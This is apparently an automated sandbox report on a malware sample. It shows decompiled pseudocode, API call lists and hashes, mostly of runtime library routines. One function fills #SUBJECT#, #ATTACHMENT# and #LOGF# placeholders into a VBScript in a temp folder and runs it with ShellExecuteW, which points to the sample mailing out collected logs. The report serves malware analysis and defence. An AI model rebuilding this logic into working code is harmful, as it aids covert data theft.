                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									_t270 = _t134;
                                                                                                                                      									goto L22;
                                                                                                                                      								} else {
                                                                                                                                      									_t270 = E0131EA21(_t206,  *_t191);
                                                                                                                                      									__eflags = _t270;
                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                      										L22:
                                                                                                                                      										E0131E420(__eflags,  *_t191);
                                                                                                                                      										return _t270;
                                                                                                                                      									}
                                                                                                                                      									goto L20;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							_t271 = GetLastError();
                                                                                                                                      							E01313C9B(_t271);
                                                                                                                                      							 *( *((intOrPtr*)(0x132f128 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x132f128 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) & 0x000000fe;
                                                                                                                                      							CloseHandle(_t253);
                                                                                                                                      							__eflags = _t271;
                                                                                                                                      							if(_t271 == 0) {
                                                                                                                                      								 *((intOrPtr*)(E01313CD1())) = 0xd;
                                                                                                                                      							}
                                                                                                                                      							goto L2;
                                                                                                                                      						}
                                                                                                                                      						_t235 = _v44;
                                                                                                                                      						__eflags = (_t235 & 0xc0000000) - 0xc0000000;
                                                                                                                                      						if((_t235 & 0xc0000000) != 0xc0000000) {
                                                                                                                                      							L9:
                                                                                                                                      							_t236 =  *_t191;
                                                                                                                                      							_t238 = (_t236 & 0x0000003f) * 0x30;
                                                                                                                                      							_t180 =  *((intOrPtr*)(0x132f128 + (_t236 >> 6) * 4));
                                                                                                                                      							_t33 = _t180 + _t238 + 0x28;
                                                                                                                                      							 *_t33 =  *(_t180 + _t238 + 0x28) & 0x000000fe;
                                                                                                                                      							__eflags =  *_t33;
                                                                                                                                      							E01313C9B(GetLastError());
                                                                                                                                      							goto L10;
                                                                                                                                      						}
                                                                                                                                      						__eflags = _a16 & 0x00000001;
                                                                                                                                      						if((_a16 & 0x00000001) == 0) {
                                                                                                                                      							goto L9;
                                                                                                                                      						}
                                                                                                                                      						_t285 = _t278 - 0x18;
                                                                                                                                      						_v44 = _t235 & 0x7fffffff;
                                                                                                                                      						_t240 = 6;
                                                                                                                                      						_push( &_v24);
                                                                                                                                      						_push(_a12);
                                                                                                                                      						memcpy(_t285,  &_v48, _t240 << 2);
                                                                                                                                      						_t198 = 0;
                                                                                                                                      						_t253 = E0131E810();
                                                                                                                                      						_t278 = _t285 + 0x2c;
                                                                                                                                      						_v12 = _t253;
                                                                                                                                      						__eflags = _t253 - 0xffffffff;
                                                                                                                                      						if(_t253 != 0xffffffff) {
                                                                                                                                      							goto L11;
                                                                                                                                      						}
                                                                                                                                      						goto L9;
                                                                                                                                      					} else {
                                                                                                                                      						 *(E01313CBE()) =  *_t186 & 0x00000000;
                                                                                                                                      						 *_t191 = _t264;
                                                                                                                                      						 *((intOrPtr*)(E01313CD1())) = 0x18;
                                                                                                                                      						goto L2;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					 *(E01313CBE()) =  *_t188 & 0x00000000;
                                                                                                                                      					 *_a8 = _t264;
                                                                                                                                      					L2:
                                                                                                                                      					return  *((intOrPtr*)(E01313CD1()));
                                                                                                                                      				}
                                                                                                                                      			}






















































                                                                                                                                      0x0131eb65
                                                                                                                                      0x0131eb69
                                                                                                                                      0x0131eb6a
                                                                                                                                      0x0131eb6a
                                                                                                                                      0x0131eb6a
                                                                                                                                      0x0131eb6c
                                                                                                                                      0x0131eb72
                                                                                                                                      0x0131eb8d
                                                                                                                                      0x0131eb92
                                                                                                                                      0x0131eb95
                                                                                                                                      0x0131eb97
                                                                                                                                      0x0131eb99
                                                                                                                                      0x0131ebb8
                                                                                                                                      0x0131ebbf
                                                                                                                                      0x0131ebc6
                                                                                                                                      0x0131ebc9
                                                                                                                                      0x0131ebd5
                                                                                                                                      0x0131ebd8
                                                                                                                                      0x0131ebe0
                                                                                                                                      0x0131ebe1
                                                                                                                                      0x0131ebe4
                                                                                                                                      0x0131ebe4
                                                                                                                                      0x0131ebeb
                                                                                                                                      0x0131ebed
                                                                                                                                      0x0131ebf0
                                                                                                                                      0x0131ebf8
                                                                                                                                      0x0131ebfb
                                                                                                                                      0x0131ec68
                                                                                                                                      0x0131ec69
                                                                                                                                      0x0131ec6f
                                                                                                                                      0x0131ec71
                                                                                                                                      0x0131ecba
                                                                                                                                      0x0131ecbd
                                                                                                                                      0x0131ecc6
                                                                                                                                      0x0131ecc9
                                                                                                                                      0x0131eccc
                                                                                                                                      0x0131ecce
                                                                                                                                      0x0131ecce
                                                                                                                                      0x0131ecce
                                                                                                                                      0x0131ecbf
                                                                                                                                      0x0131ecc2
                                                                                                                                      0x0131ecc2
                                                                                                                                      0x0131ecd3
                                                                                                                                      0x0131ecd6
                                                                                                                                      0x0131ece2
                                                                                                                                      0x0131ece7
                                                                                                                                      0x0131ecf3
                                                                                                                                      0x0131ecfd
                                                                                                                                      0x0131ed01
                                                                                                                                      0x0131ed0b
                                                                                                                                      0x0131ed0e
                                                                                                                                      0x0131ed19
                                                                                                                                      0x0131ed1e
                                                                                                                                      0x0131ed2e
                                                                                                                                      0x0131ed31
                                                                                                                                      0x0131ed35
                                                                                                                                      0x0131ed36
                                                                                                                                      0x0131ed3c
                                                                                                                                      0x0131ed41
                                                                                                                                      0x0131ed44
                                                                                                                                      0x0131ed46
                                                                                                                                      0x0131ed48
                                                                                                                                      0x0131ed4d
                                                                                                                                      0x0131ed50
                                                                                                                                      0x0131ed52
                                                                                                                                      0x0131ed7c
                                                                                                                                      0x0131eda0
                                                                                                                                      0x0131eda4
                                                                                                                                      0x0131eda8
                                                                                                                                      0x0131edaa
                                                                                                                                      0x0131edae
                                                                                                                                      0x0131edb0
                                                                                                                                      0x0131edba
                                                                                                                                      0x0131edbd
                                                                                                                                      0x0131edc4
                                                                                                                                      0x0131edc4
                                                                                                                                      0x0131edc4
                                                                                                                                      0x0131edc4
                                                                                                                                      0x0131edae
                                                                                                                                      0x0131edc9
                                                                                                                                      0x0131edd5
                                                                                                                                      0x0131edd7
                                                                                                                                      0x0131ee62
                                                                                                                                      0x0131ee62
                                                                                                                                      0x00000000
                                                                                                                                      0x0131eddd
                                                                                                                                      0x0131eddd
                                                                                                                                      0x0131ede1
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ede6
                                                                                                                                      0x0131edf8
                                                                                                                                      0x0131ee00
                                                                                                                                      0x0131ee03
                                                                                                                                      0x0131ee04
                                                                                                                                      0x0131ee07
                                                                                                                                      0x0131ee0e
                                                                                                                                      0x0131ee13
                                                                                                                                      0x0131ee16
                                                                                                                                      0x0131ee4a
                                                                                                                                      0x0131ee54
                                                                                                                                      0x0131ee54
                                                                                                                                      0x0131ee5e
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ee5e
                                                                                                                                      0x0131ee1f
                                                                                                                                      0x0131ee38
                                                                                                                                      0x0131ee3f
                                                                                                                                      0x0131ec62
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ec62
                                                                                                                                      0x0131edd7
                                                                                                                                      0x0131ed54
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ed20
                                                                                                                                      0x0131ed27
                                                                                                                                      0x0131ed2a
                                                                                                                                      0x0131ed2c
                                                                                                                                      0x0131ed56
                                                                                                                                      0x0131ed58
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ed5e
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ed2c
                                                                                                                                      0x0131ed1e
                                                                                                                                      0x0131ec79
                                                                                                                                      0x0131ec7c
                                                                                                                                      0x0131ec97
                                                                                                                                      0x0131ec9c
                                                                                                                                      0x0131eca2
                                                                                                                                      0x0131eca4
                                                                                                                                      0x0131ecaf
                                                                                                                                      0x0131ecaf
                                                                                                                                      0x00000000
                                                                                                                                      0x0131eca4
                                                                                                                                      0x0131ebfd
                                                                                                                                      0x0131ec04
                                                                                                                                      0x0131ec06
                                                                                                                                      0x0131ec3d
                                                                                                                                      0x0131ec3d
                                                                                                                                      0x0131ec47
                                                                                                                                      0x0131ec4a
                                                                                                                                      0x0131ec51
                                                                                                                                      0x0131ec51
                                                                                                                                      0x0131ec51
                                                                                                                                      0x0131ec5d
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ec5d
                                                                                                                                      0x0131ec08
                                                                                                                                      0x0131ec0c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ec0e
                                                                                                                                      0x0131ec1d
                                                                                                                                      0x0131ec22
                                                                                                                                      0x0131ec25
                                                                                                                                      0x0131ec26
                                                                                                                                      0x0131ec29
                                                                                                                                      0x0131ec29
                                                                                                                                      0x0131ec30
                                                                                                                                      0x0131ec32
                                                                                                                                      0x0131ec35
                                                                                                                                      0x0131ec38
                                                                                                                                      0x0131ec3b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131eb9b
                                                                                                                                      0x0131eba0
                                                                                                                                      0x0131eba3
                                                                                                                                      0x0131ebaa
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ebaa
                                                                                                                                      0x0131eb74
                                                                                                                                      0x0131eb79
                                                                                                                                      0x0131eb7f
                                                                                                                                      0x0131eb81
                                                                                                                                      0x00000000
                                                                                                                                      0x0131eb86

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0131E810: CreateFileW.KERNEL32(00000000,00000000,?,0131EBEB,?,?,00000000,?,0131EBEB,00000000,0000000C), ref: 0131E82D
                                                                                                                                      • GetLastError.KERNEL32 ref: 0131EC56
                                                                                                                                      • __dosmaperr.LIBCMT ref: 0131EC5D
                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 0131EC69
                                                                                                                                      • GetLastError.KERNEL32 ref: 0131EC73
                                                                                                                                      • __dosmaperr.LIBCMT ref: 0131EC7C
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0131EC9C
                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0131EDE6
                                                                                                                                      • GetLastError.KERNEL32 ref: 0131EE18
                                                                                                                                      • __dosmaperr.LIBCMT ref: 0131EE1F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                      • String ID: H
                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                      • Opcode ID: d06768ea9bb60efab16850bf0c82cc843ae333a831e428c047469306339184d2
                                                                                                                                      • Instruction ID: af2e1e877ae5fdf1cdb88ebacab3a4f95aa2eaaa66735eeaaa125c3fffe03ba6
                                                                                                                                      • Opcode Fuzzy Hash: d06768ea9bb60efab16850bf0c82cc843ae333a831e428c047469306339184d2
                                                                                                                                      • Instruction Fuzzy Hash: 22A13832A041598FDF2EAFACDC51BAE7BB5AB0A328F14016DEC11DB395D7329812C751
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E01311F37(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                      				int _v8;
                                                                                                                                      				int _v12;
                                                                                                                                      				char _v16;
                                                                                                                                      				intOrPtr _v24;
                                                                                                                                      				char _v28;
                                                                                                                                      				void* __ebx;
                                                                                                                                      				char* _t31;
                                                                                                                                      				int _t35;
                                                                                                                                      				int _t43;
                                                                                                                                      				void* _t51;
                                                                                                                                      				int _t52;
                                                                                                                                      				int _t54;
                                                                                                                                      				void* _t56;
                                                                                                                                      				void* _t63;
                                                                                                                                      				short* _t64;
                                                                                                                                      				short* _t67;
                                                                                                                                      
                                                                                                                                      				_t62 = __edx;
                                                                                                                                      				E0130E1A2(_t51,  &_v28, __edx, _a24);
                                                                                                                                      				_t52 = 0;
                                                                                                                                      				_t54 =  *(_v24 + 0x14);
                                                                                                                                      				_t31 = _a4;
                                                                                                                                      				_v8 = _t54;
                                                                                                                                      				if(_t31 == 0) {
                                                                                                                                      					L4:
                                                                                                                                      					 *((intOrPtr*)(E01313CD1())) = 0x16;
                                                                                                                                      					E013110B9();
                                                                                                                                      					L18:
                                                                                                                                      					if(_v16 != 0) {
                                                                                                                                      						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                                                      					}
                                                                                                                                      					return _t52;
                                                                                                                                      				}
                                                                                                                                      				_t66 = _a8;
                                                                                                                                      				if(_a8 == 0) {
                                                                                                                                      					goto L4;
                                                                                                                                      				}
                                                                                                                                      				 *_t31 = 0;
                                                                                                                                      				if(_a12 == 0 || _a16 == 0) {
                                                                                                                                      					goto L4;
                                                                                                                                      				} else {
                                                                                                                                      					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
                                                                                                                                      					_v12 = _t35;
                                                                                                                                      					if(_t35 != 0) {
                                                                                                                                      						_t64 = E013151CD(_t54, _t35 + _t35);
                                                                                                                                      						_t56 = _t63;
                                                                                                                                      						if(_t64 != 0) {
                                                                                                                                      							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
                                                                                                                                      								_t67 = E013151CD(_t56, _t66 + _t66);
                                                                                                                                      								if(_t67 != 0) {
                                                                                                                                      									_t43 = E01317F54(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
                                                                                                                                      									_v12 = _t43;
                                                                                                                                      									if(_t43 != 0) {
                                                                                                                                      										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
                                                                                                                                      											_t52 = _v12;
                                                                                                                                      										} else {
                                                                                                                                      											E01313C9B(GetLastError());
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								E01314615(_t67);
                                                                                                                                      							} else {
                                                                                                                                      								E01313C9B(GetLastError());
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						E01314615(_t64);
                                                                                                                                      					} else {
                                                                                                                                      						E01313C9B(GetLastError());
                                                                                                                                      					}
                                                                                                                                      					goto L18;
                                                                                                                                      				}
                                                                                                                                      			}



















                                                                                                                                      0x01311f37
                                                                                                                                      0x01311f47
                                                                                                                                      0x01311f4f
                                                                                                                                      0x01311f51
                                                                                                                                      0x01311f54
                                                                                                                                      0x01311f57
                                                                                                                                      0x01311f5c
                                                                                                                                      0x01311f71
                                                                                                                                      0x01311f76
                                                                                                                                      0x01311f7c
                                                                                                                                      0x0131204e
                                                                                                                                      0x01312052
                                                                                                                                      0x01312057
                                                                                                                                      0x01312057
                                                                                                                                      0x01312065
                                                                                                                                      0x01312065
                                                                                                                                      0x01311f5e
                                                                                                                                      0x01311f63
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01311f65
                                                                                                                                      0x01311f6a
                                                                                                                                      0x00000000
                                                                                                                                      0x01311f86
                                                                                                                                      0x01311f8f
                                                                                                                                      0x01311f95
                                                                                                                                      0x01311f9a
                                                                                                                                      0x01311fb7
                                                                                                                                      0x01311fb9
                                                                                                                                      0x01311fbc
                                                                                                                                      0x01311fd7
                                                                                                                                      0x01311ff0
                                                                                                                                      0x01311ff5
                                                                                                                                      0x01312005
                                                                                                                                      0x0131200d
                                                                                                                                      0x01312012
                                                                                                                                      0x0131202b
                                                                                                                                      0x0131203c
                                                                                                                                      0x0131202d
                                                                                                                                      0x01312034
                                                                                                                                      0x01312039
                                                                                                                                      0x0131202b
                                                                                                                                      0x01312012
                                                                                                                                      0x01312040
                                                                                                                                      0x01311fd9
                                                                                                                                      0x01311fe0
                                                                                                                                      0x01311fe0
                                                                                                                                      0x01312045
                                                                                                                                      0x01312047
                                                                                                                                      0x01311f9c
                                                                                                                                      0x01311fa3
                                                                                                                                      0x01311fa8
                                                                                                                                      0x00000000
                                                                                                                                      0x01311f9a

                                                                                                                                      APIs
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,00000000,01306B11,00000000,0130791F,?,00000050,%H%M,00000000,00000000), ref: 01311F8F
                                                                                                                                      • GetLastError.KERNEL32 ref: 01311F9C
                                                                                                                                      • __dosmaperr.LIBCMT ref: 01311FA3
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,000000FF,00000000,?), ref: 01311FCF
                                                                                                                                      • GetLastError.KERNEL32 ref: 01311FD9
                                                                                                                                      • __dosmaperr.LIBCMT ref: 01311FE0
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 01312023
                                                                                                                                      • GetLastError.KERNEL32 ref: 0131202D
                                                                                                                                      • __dosmaperr.LIBCMT ref: 01312034
                                                                                                                                      • _free.LIBCMT ref: 01312040
                                                                                                                                      • _free.LIBCMT ref: 01312047
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2441525078-0
                                                                                                                                      • Opcode ID: 88abb8e8f1c97aa9cfe95d1e87be8a4b965d3cd85801bddf6cd63414433567ae
                                                                                                                                      • Instruction ID: 675f1985872dc2a5a6aabe220bdbe32d8740ac379afde98baef329a65118ff39
                                                                                                                                      • Opcode Fuzzy Hash: 88abb8e8f1c97aa9cfe95d1e87be8a4b965d3cd85801bddf6cd63414433567ae
                                                                                                                                      • Instruction Fuzzy Hash: 0831A27290424ABFDF296FA9DC48CAF3F6DFF55368F244218F91056158EB318910CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E013044DB(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t46;
                                                                                                                                      				void* _t51;
                                                                                                                                      				void* _t53;
                                                                                                                                      				void* _t60;
                                                                                                                                      				void* _t66;
                                                                                                                                      				void* _t72;
                                                                                                                                      				void* _t78;
                                                                                                                                      				void* _t79;
                                                                                                                                      				void* _t90;
                                                                                                                                      				void* _t91;
                                                                                                                                      				void* _t149;
                                                                                                                                      				void* _t151;
                                                                                                                                      				intOrPtr _t153;
                                                                                                                                      				void* _t155;
                                                                                                                                      
                                                                                                                                      				_t134 = __edx;
                                                                                                                                      				_t91 = __ecx;
                                                                                                                                      				E01323174(E013233DC, __edx, __eflags);
                                                                                                                                      				_t46 = E0130282E(E01304C09(_t134, _t91, _t149, __eflags, 0x26), __eflags);
                                                                                                                                      				_t1 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				E013027E1(_t1, _t134, _t46);
                                                                                                                                      				 *((intOrPtr*)(_t149 - 4)) = 0;
                                                                                                                                      				E01307239(_t91, 0);
                                                                                                                                      				_t153 = _t151 - 0x6c;
                                                                                                                                      				 *((char*)(_t149 - 4)) = 1;
                                                                                                                                      				_t5 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				 *((intOrPtr*)(_t149 - 0x14)) = _t153;
                                                                                                                                      				E01302814(_t153, _t91, 0, _t5);
                                                                                                                                      				_push(0x132fa5c);
                                                                                                                                      				 *((char*)(_t149 - 4)) = 2;
                                                                                                                                      				_t8 = _t149 - 0x8c; // 0x1306ab5
                                                                                                                                      				_t51 = E01303294(_t8, L"Log ", 0);
                                                                                                                                      				 *((char*)(_t149 - 4)) = 3;
                                                                                                                                      				_push(E01302712(_t51, 0));
                                                                                                                                      				 *((char*)(_t149 - 4)) = 4;
                                                                                                                                      				_t11 = _t149 - 0x74; // 0x1306acd
                                                                                                                                      				_t53 = E01307E44(_t11, L"#SUBJECT#", 0);
                                                                                                                                      				_t12 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				E0130275A(_t12, L"#SUBJECT#", _t53);
                                                                                                                                      				_t13 = _t149 - 0x74; // 0x1306acd
                                                                                                                                      				E01302755(_t13, L"#SUBJECT#", 0);
                                                                                                                                      				_t14 = _t149 - 0x8c; // 0x1306ab5
                                                                                                                                      				 *((char*)(_t149 - 4)) = 1;
                                                                                                                                      				E01302755(_t14, L"#SUBJECT#", 0);
                                                                                                                                      				_t155 = _t153 + 0x1c - 0x18;
                                                                                                                                      				_t16 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				E01302814(_t155, L"#SUBJECT#", 0, _t16);
                                                                                                                                      				_push(E01302712(_t91, 0));
                                                                                                                                      				_t17 = _t149 - 0x8c; // 0x1306ab5
                                                                                                                                      				_t60 = E01307E44(_t17, L"#ATTACHMENT#", 0);
                                                                                                                                      				_t18 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				E0130275A(_t18, L"#ATTACHMENT#", _t60);
                                                                                                                                      				_t19 = _t149 - 0x8c; // 0x1306ab5
                                                                                                                                      				E01302755(_t19, L"#ATTACHMENT#", 0);
                                                                                                                                      				_t157 = _t155 + 0x1c - 0x18;
                                                                                                                                      				_t20 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				E01302814(_t155 + 0x1c - 0x18, L"#ATTACHMENT#", 0, _t20);
                                                                                                                                      				_push(E01302712(0x132f9c8, 0));
                                                                                                                                      				_t21 = _t149 - 0x8c; // 0x1306ab5
                                                                                                                                      				_t66 = E01307E44(_t21, L"#LOGF#", 0);
                                                                                                                                      				_t22 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				E0130275A(_t22, L"#LOGF#", _t66);
                                                                                                                                      				_t23 = _t149 - 0x8c; // 0x1306ab5
                                                                                                                                      				E01302755(_t23, L"#LOGF#", 0);
                                                                                                                                      				_t24 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				E01302814(_t157 + 0x1c - 0x18, L"#LOGF#", 0, _t24);
                                                                                                                                      				_t25 = _t149 - 0x5c; // 0x1306ae5
                                                                                                                                      				_push(E01302712(_t25, 0));
                                                                                                                                      				_t26 = _t149 - 0x8c; // 0x1306ab5
                                                                                                                                      				_t72 = E01307E44(_t26, L"#TMPDIR#", 0);
                                                                                                                                      				_t27 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				E0130275A(_t27, L"#TMPDIR#", _t72);
                                                                                                                                      				_t28 = _t149 - 0x8c; // 0x1306ab5
                                                                                                                                      				E01302755(_t28, L"#TMPDIR#", 0);
                                                                                                                                      				E01302814(_t157 + 0x1c - 0x18 + 0x1c - 0x18, L"#TMPDIR#", 0, 0x132fabc);
                                                                                                                                      				_t29 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				E01304860(_t29, L"#TMPDIR#", 0);
                                                                                                                                      				_t30 = _t149 - 0x74; // 0x1306acd
                                                                                                                                      				_t141 = E01306F77(_t30, L"#TMPDIR#", 0);
                                                                                                                                      				 *((char*)(_t149 - 4)) = 5;
                                                                                                                                      				_t32 = _t149 - 0x8c; // 0x1306ab5
                                                                                                                                      				_t78 = E01303313(_t32, _t77, ".vbs");
                                                                                                                                      				 *((char*)(_t149 - 4)) = 6;
                                                                                                                                      				_t79 = E0130282E(_t78, 0);
                                                                                                                                      				_t34 = _t149 - 0x44; // 0x1306afd
                                                                                                                                      				E01307630(_t34, _t77, 0);
                                                                                                                                      				_t35 = _t149 - 0x8c; // 0x1306ab5
                                                                                                                                      				E013028AF(_t35, _t77, 0);
                                                                                                                                      				_t36 = _t149 - 0x74; // 0x1306acd
                                                                                                                                      				 *((char*)(_t149 - 4)) = 9;
                                                                                                                                      				E013028AF(_t36, _t77, 0);
                                                                                                                                      				_t38 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				_t39 = _t149 - 0x44; // 0x1306afd
                                                                                                                                      				E01302814(_t157 + 0x1c - 0x18 + 0x1c - 0x18 + 0x1c - 0x18, _t77, 0, _t38);
                                                                                                                                      				E01307CE4(_t39, 0, _t79);
                                                                                                                                      				ShellExecuteW(0, L"open", E01302712(_t39, 0), 0, 0, 0);
                                                                                                                                      				E01302755(_t39, _t77, 0);
                                                                                                                                      				_t40 = _t149 - 0x5c; // 0x1306ae5
                                                                                                                                      				E01302755(_t40, _t77, 0);
                                                                                                                                      				_t41 = _t149 - 0x2c; // 0x1306b15
                                                                                                                                      				_t90 = E01302755(_t41, _t141, 0);
                                                                                                                                      				_t42 = _t149 - 0xc; // 0x89645e5f
                                                                                                                                      				 *[fs:0x0] =  *_t42;
                                                                                                                                      				return _t90;
                                                                                                                                      			}


















                                                                                                                                      0x013044db
                                                                                                                                      0x013044db
                                                                                                                                      0x013044e0
                                                                                                                                      0x013044f8
                                                                                                                                      0x013044fe
                                                                                                                                      0x01304501
                                                                                                                                      0x0130450d
                                                                                                                                      0x01304510
                                                                                                                                      0x01304515
                                                                                                                                      0x01304518
                                                                                                                                      0x0130451c
                                                                                                                                      0x0130451f
                                                                                                                                      0x01304525
                                                                                                                                      0x0130452a
                                                                                                                                      0x01304534
                                                                                                                                      0x01304538
                                                                                                                                      0x0130453e
                                                                                                                                      0x01304544
                                                                                                                                      0x0130454f
                                                                                                                                      0x01304555
                                                                                                                                      0x01304559
                                                                                                                                      0x0130455c
                                                                                                                                      0x01304564
                                                                                                                                      0x01304568
                                                                                                                                      0x0130456d
                                                                                                                                      0x01304570
                                                                                                                                      0x01304575
                                                                                                                                      0x0130457b
                                                                                                                                      0x0130457f
                                                                                                                                      0x01304584
                                                                                                                                      0x01304587
                                                                                                                                      0x0130458d
                                                                                                                                      0x01304599
                                                                                                                                      0x0130459f
                                                                                                                                      0x013045a5
                                                                                                                                      0x013045ad
                                                                                                                                      0x013045b1
                                                                                                                                      0x013045b6
                                                                                                                                      0x013045bc
                                                                                                                                      0x013045c1
                                                                                                                                      0x013045c4
                                                                                                                                      0x013045ca
                                                                                                                                      0x013045d9
                                                                                                                                      0x013045df
                                                                                                                                      0x013045e5
                                                                                                                                      0x013045ed
                                                                                                                                      0x013045f1
                                                                                                                                      0x013045f6
                                                                                                                                      0x013045fc
                                                                                                                                      0x01304604
                                                                                                                                      0x0130460a
                                                                                                                                      0x0130460f
                                                                                                                                      0x01304617
                                                                                                                                      0x0130461d
                                                                                                                                      0x01304623
                                                                                                                                      0x0130462b
                                                                                                                                      0x0130462f
                                                                                                                                      0x01304634
                                                                                                                                      0x0130463a
                                                                                                                                      0x01304649
                                                                                                                                      0x0130464e
                                                                                                                                      0x01304651
                                                                                                                                      0x01304656
                                                                                                                                      0x01304663
                                                                                                                                      0x01304665
                                                                                                                                      0x01304669
                                                                                                                                      0x0130466f
                                                                                                                                      0x01304679
                                                                                                                                      0x0130467d
                                                                                                                                      0x01304683
                                                                                                                                      0x01304686
                                                                                                                                      0x0130468c
                                                                                                                                      0x01304692
                                                                                                                                      0x01304697
                                                                                                                                      0x0130469a
                                                                                                                                      0x0130469e
                                                                                                                                      0x013046a6
                                                                                                                                      0x013046ab
                                                                                                                                      0x013046af
                                                                                                                                      0x013046b6
                                                                                                                                      0x013046cf
                                                                                                                                      0x013046d7
                                                                                                                                      0x013046dc
                                                                                                                                      0x013046df
                                                                                                                                      0x013046e4
                                                                                                                                      0x013046e7
                                                                                                                                      0x013046ec
                                                                                                                                      0x013046f0
                                                                                                                                      0x013046f9

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 013044E0
                                                                                                                                        • Part of subcall function 01303294: __EH_prolog.LIBCMT ref: 01303299
                                                                                                                                        • Part of subcall function 01307E44: __EH_prolog.LIBCMT ref: 01307E49
                                                                                                                                        • Part of subcall function 01304860: __EH_prolog.LIBCMT ref: 01304865
                                                                                                                                        • Part of subcall function 01304860: FindFirstFileW.KERNEL32(00000000,01306835,00000000,?,00000000), ref: 013048BF
                                                                                                                                        • Part of subcall function 01304860: FindNextFileW.KERNEL32(00000000,01306835,?,00000000), ref: 013048E3
                                                                                                                                        • Part of subcall function 01304860: FindNextFileW.KERNEL32(00000000,01306835,?,00000000), ref: 013049AC
                                                                                                                                        • Part of subcall function 01306F77: __EH_prolog.LIBCMT ref: 01306F7C
                                                                                                                                        • Part of subcall function 01306F77: GetCurrentProcessId.KERNEL32(00000000,74D0FBB0,00000000), ref: 01306FB7
